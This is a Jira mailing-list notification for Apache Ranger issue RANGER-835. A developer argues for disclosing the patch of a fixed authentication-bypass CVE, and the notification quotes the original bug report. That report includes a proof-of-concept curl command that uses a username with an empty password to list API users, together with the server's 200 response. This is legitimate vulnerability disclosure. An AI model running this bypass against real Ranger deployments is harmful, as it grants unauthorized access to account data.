[jira] [Commented] (RANGER-835) Authentication bypass in Ranger API

Wed, 10 Feb 2016 12:30:32 -0800 

    [ 
https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15141599#comment-15141599
 ] 

Dilli Dorai Minnal Arumugam commented on RANGER-835:
----------------------------------------------------

[~lmccay]
We are Apache open source project.
Code is already committed and CVE is released and implementation details are 
already in public.
There is no need to reverse engineer.
We do not want to disclose what is the commit id and patch for a commit with 
code in public and CVE released?
You seem to imply not disclosing the commit id and patch for the code that is 
out in open with CVE released, gets us security.
In my humble opinion, I think this does not protect us from bad guys. This just 
hinders good guys and legitimate customers.
If there are doubts on correctness of implementation, CVE should not have been 
released.
I made my best attempts here to do what I think is right thing and rest now 
though I disagree with your interpretation of #15


> Authentication bypass in Ranger API
> -----------------------------------
>
>                 Key: RANGER-835
>                 URL: https://issues.apache.org/jira/browse/RANGER-835
>             Project: Ranger
>          Issue Type: Bug
>          Components: Ranger
>    Affects Versions: 0.5.0
>            Reporter: Jim Halfpenny
>            Priority: Critical
>              Labels: authentication, security, vulnerability
>             Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid 
> username along with a null password. API authentication appears to work 
> correctly, rejecting requests if the password is incorrect but allows 
> requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of 
> the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> *   Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> > 
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> < 
> <?xml version="1.0" encoding="UTF-8" 
> standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Reply via email to